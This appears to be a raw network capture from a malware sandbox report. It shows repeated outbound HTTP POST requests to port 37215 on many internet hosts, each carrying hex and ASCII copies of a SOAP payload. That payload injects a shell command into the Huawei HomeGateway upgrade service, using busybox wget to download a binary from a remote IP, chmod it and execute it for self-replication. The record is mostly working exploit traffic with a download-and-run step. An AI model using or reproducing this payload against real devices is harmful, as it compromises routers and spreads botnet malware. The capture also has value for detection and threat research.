                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1278192.168.2.1336104157.74.246.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450489044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1279192.168.2.1359226157.205.218.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450506926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1280192.168.2.1342316157.64.28.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450566053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1281192.168.2.1339948157.4.110.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450581074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1282192.168.2.13434202.51.97.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450953007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1283192.168.2.1349014197.54.205.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451064110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1284192.168.2.1349828157.97.125.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451080084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1285192.168.2.133878641.71.204.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451132059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1286192.168.2.1349510197.178.150.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451162100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1287192.168.2.1351658197.222.91.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451175928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
